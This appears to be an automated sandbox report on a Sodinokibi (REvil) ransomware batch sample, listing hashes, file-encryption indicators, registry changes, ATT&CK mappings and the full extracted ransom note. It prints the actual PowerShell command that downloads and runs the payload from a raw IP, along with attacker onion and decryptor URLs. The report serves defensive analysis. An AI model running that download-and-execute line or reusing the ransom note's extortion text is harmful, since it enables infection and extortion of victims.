sodinokibi | 32fd1da6b6ea751505cb7a81d90fc2f0925a62a78c917262e96fee968b627474

General

Target

59757318723e5bcf0dc7acb1e50a016f.bat
Size

220B
MD5

3ce440975e6a9f2c1b282370f89d2c24
SHA1

78649de7adceedaf9701fee3ae23b048df1ae0fb
SHA256

32fd1da6b6ea751505cb7a81d90fc2f0925a62a78c917262e96fee968b627474
SHA512

179853fc7cb0339b71778d815c0c2834027bc942a70a832149ce62ce0bd05f99222032affe9c07e01542071dc2ca11343d45ee29945bc6d19cee9d4679953188

Score

10^/10

ransomware sodinokibi persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/59757318723e5bcf0dc7acb1e50a016f

Extracted

Path

C:\atmf00-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension atmf00. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] WE ARE READY TO PUBLISH UR DATA TO PUBLIC ACCESS IF YOU NOT CONTACT US (USE TOR BROWSER TO VIEW) http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/140?s=61908812b95c5ff1176e968733afaf55 [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2C1895CC9C2E527E 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/2C1895CC9C2E527E Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: gARlp9Bfo69DDyoQsjiYkuOEYcR2w34ZEW0p2ax6DvfxM8/OuLySo0rJfpdJbrDL 5wtkt4Jbr4ijlmZT6XjQcDQwAjBLmWCRd/g32t1fx+EVAgsznQHc5lZAhLHnG6Fk 4GL03ZNEzeJURqxgX9meDAtinlSLGcQ6KnP0IqTNDV9xZBkVyOKwT85G4/qZ0IsK URHgrCHNmVsNft6+33ZJ7tyF+UnjjiKyXIHnyuDpuh/8eyHp5Zb/vc8R6s/x4TJX Yk+ba8W7TU81oemqq/2XQiG+MW3szV9MPURDdmHI6F8Gsb3mhm//ucuMAA2kV1Yo RvBK+Ks57rRbtTJkAfIgDyt0YYEnX4oO/yGbu23KF+BQA/gc6MBHfTEVZUmqGbSI aXPvztcfysxooyfuv7hfcLQqKAw/exZBeX4v66RIVAPCgRny++s7149USD/1jgQQ 64PBRu4RitYjtQa5gOM6SHlzouN+K8d+Hf9bDR3ip76oX9RiATEAYcg6BqDYCi0X NPERP4jTEZQpQj8jvSUkpZbTRqEjpKlCh00DNaZd8GLE5U+GYOU9aSx2zSOoBEQS gtMQELWx4hml0dKhaFlBRB7SvAFKsc1+bkh84YTB2wgh8Dt9Kr43nFNz4D/+woIw ME+rwDRCqJoAzhqK4fkD+7bCQcqmNBS4BwsLf85TlDg+KY39+DPTF/5wYPKD+xF6 0J9AbgDyJxnoxLVYY5xbeTvH2L6nEvihChfkmr0obkgqQp1HlXRxwxxp6y0Rwqmp tZy/T8peA2PGdJlXte6zHDQ5YqNrqZxq5WIGuSU2KwonBMJKfiTcPii+hafVi6Qs jRBUoeNheATyQWtdXH3NfuIbl7if1+nWAzWkKTIlG1DSj9ZI2VqbpIbg3nZxS5B6 uhbnWrCxbG5eAP+HpjARIVHKNIxWhd2Ef+wL96k4a3k9Qj4OjIkeVLBqoiciZ2Y2 wlbwpjbENwpPnKOgGTshI0woJxzK3qMRFt8O0ZsoSF19kDTciX3trS+QEWXO/KN/ p+bh9PJGP88xPMvUbybuICItSR/NU/Slz8JWaZUvxlXkGt8aGnsBL1N1hU/RyNPc 3gmFKw35RM496WYaYta2c+6jTkU3/Kxau9eD0MLvZKmp4it9w62wmWIjWJmmpRdE /pl7lCSWqlG8JPeAPA0QN9hu+cBaqyzB3gQh8Bt7ZFNCOWmbnacE1biqh6BN6hzp 5MeYBumfLuhGsEv9hctV3VZNdPhf1vy3tyNuog5G+6KybO+kEQAUb3zPWx9ezFUI D/Nws74y42pO0s6GIGhfQw== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2C1895CC9C2E527E

http://decryptor.cc/2C1895CC9C2E527E

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

1 1020 powershell.exe

flow	pid	process
1	1020	powershell.exe

Modifies extensions of user files 10 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\users\admin\pictures\LockBackup.tiff	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\RedoHide.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\GrantProtect.png => \??\c:\users\admin\pictures\GrantProtect.png.atmf00	powershell.exe
File renamed	C:\Users\Admin\Pictures\ResolveFind.tiff => \??\c:\users\admin\pictures\ResolveFind.tiff.atmf00	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\ResolveFind.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\CheckpointSuspend.png => \??\c:\users\admin\pictures\CheckpointSuspend.png.atmf00	powershell.exe
File renamed	C:\Users\Admin\Pictures\ExportSwitch.png => \??\c:\users\admin\pictures\ExportSwitch.png.atmf00	powershell.exe
File renamed	C:\Users\Admin\Pictures\HideSuspend.tif => \??\c:\users\admin\pictures\HideSuspend.tif.atmf00	powershell.exe
File renamed	C:\Users\Admin\Pictures\LockBackup.tiff => \??\c:\users\admin\pictures\LockBackup.tiff.atmf00	powershell.exe
File renamed	C:\Users\Admin\Pictures\RedoHide.tiff => \??\c:\users\admin\pictures\RedoHide.tiff.atmf00	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\c15jqxwg56.bmp"	powershell.exe

Drops file in Program Files directory 37 IoCs

Processes:

powershell.exe

description	ioc	process
File created	\??\c:\program files (x86)\atmf00-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ImportCopy.asx	powershell.exe
File opened for modification	\??\c:\program files\InitializeReceive.wmf	powershell.exe
File opened for modification	\??\c:\program files\ResumeOptimize.docm	powershell.exe
File opened for modification	\??\c:\program files\SaveInvoke.i64	powershell.exe
File opened for modification	\??\c:\program files\SuspendMerge.3gp	powershell.exe
File created	\??\c:\program files\atmf00-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ApproveMove.M2TS	powershell.exe
File opened for modification	\??\c:\program files\GroupConfirm.mpeg3	powershell.exe
File opened for modification	\??\c:\program files\InitializeResume.emz	powershell.exe
File opened for modification	\??\c:\program files\OutSet.rtf	powershell.exe
File opened for modification	\??\c:\program files\ShowPing.3g2	powershell.exe
File opened for modification	\??\c:\program files\BlockConvertTo.crw	powershell.exe
File opened for modification	\??\c:\program files\EnableConnect.m4v	powershell.exe
File opened for modification	\??\c:\program files\RegisterDebug.asp	powershell.exe
File opened for modification	\??\c:\program files\UnpublishHide.doc	powershell.exe
File opened for modification	\??\c:\program files\UnpublishStop.wmv	powershell.exe
File opened for modification	\??\c:\program files\AssertSuspend.avi	powershell.exe
File opened for modification	\??\c:\program files\DisableTest.mpeg	powershell.exe
File opened for modification	\??\c:\program files\FormatOut.jtx	powershell.exe
File opened for modification	\??\c:\program files\GrantClear.vsdm	powershell.exe
File opened for modification	\??\c:\program files\DisconnectUnblock.raw	powershell.exe
File opened for modification	\??\c:\program files\PingUnregister.clr	powershell.exe
File opened for modification	\??\c:\program files\ReadDisable.inf	powershell.exe
File opened for modification	\??\c:\program files\SelectRedo.ADT	powershell.exe
File opened for modification	\??\c:\program files\SplitMount.ini	powershell.exe
File opened for modification	\??\c:\program files\SuspendConvertFrom.vdw	powershell.exe
File opened for modification	\??\c:\program files\CheckpointDismount.vst	powershell.exe
File opened for modification	\??\c:\program files\CompleteMount.txt	powershell.exe
File opened for modification	\??\c:\program files\DebugConvertFrom.pcx	powershell.exe
File opened for modification	\??\c:\program files\MeasureRestore.ppsm	powershell.exe
File opened for modification	\??\c:\program files\MeasureSkip.eps	powershell.exe
File opened for modification	\??\c:\program files\LimitUse.i64	powershell.exe
File opened for modification	\??\c:\program files\OutRevoke.pub	powershell.exe
File opened for modification	\??\c:\program files\DebugUninstall.ogg	powershell.exe
File opened for modification	\??\c:\program files\InstallEdit.txt	powershell.exe
File opened for modification	\??\c:\program files\LimitShow.aifc	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exe

pid process

1020 powershell.exe
1020 powershell.exe
1020 powershell.exe
1020 powershell.exe
1020 powershell.exe

pid	process
1020	powershell.exe
1020	powershell.exe
1020	powershell.exe
1020	powershell.exe
1020	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeTakeOwnershipPrivilege	1020	powershell.exe
Token: SeBackupPrivilege	3880	vssvc.exe
Token: SeRestorePrivilege	3880	vssvc.exe
Token: SeAuditPrivilege	3880	vssvc.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 3984 wrote to memory of 1020	3984	cmd.exe	powershell.exe
PID 3984 wrote to memory of 1020	3984	cmd.exe	powershell.exe
PID 3984 wrote to memory of 1020	3984	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\59757318723e5bcf0dc7acb1e50a016f.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/59757318723e5bcf0dc7acb1e50a016f');Invoke-CIGRXCCUEVHBH;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3880

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1020-0-0x0000000000000000-mapping.dmp

Download
memory/1020-1-0x0000000073A50000-0x000000007413E000-memory.dmp

Filesize
6.9MB

Download
memory/1020-2-0x0000000004C50000-0x0000000004C51000-memory.dmp

Filesize
4KB

Download
memory/1020-3-0x00000000076C0000-0x00000000076C1000-memory.dmp

Filesize
4KB

Download
memory/1020-4-0x0000000007590000-0x0000000007591000-memory.dmp

Filesize
4KB

Download
memory/1020-5-0x0000000007D60000-0x0000000007D61000-memory.dmp

Filesize
4KB

Download
memory/1020-6-0x0000000007F60000-0x0000000007F61000-memory.dmp

Filesize
4KB

Download
memory/1020-7-0x00000000080D0000-0x00000000080D1000-memory.dmp

Filesize
4KB

Download
memory/1020-8-0x0000000007E90000-0x0000000007E91000-memory.dmp

Filesize
4KB

Download
memory/1020-9-0x0000000008870000-0x0000000008871000-memory.dmp

Filesize
4KB

Download
memory/1020-10-0x0000000008740000-0x0000000008741000-memory.dmp

Filesize
4KB

Download
memory/1020-11-0x0000000009F40000-0x0000000009F41000-memory.dmp

Filesize
4KB

Download
memory/1020-12-0x00000000094D0000-0x00000000094D1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads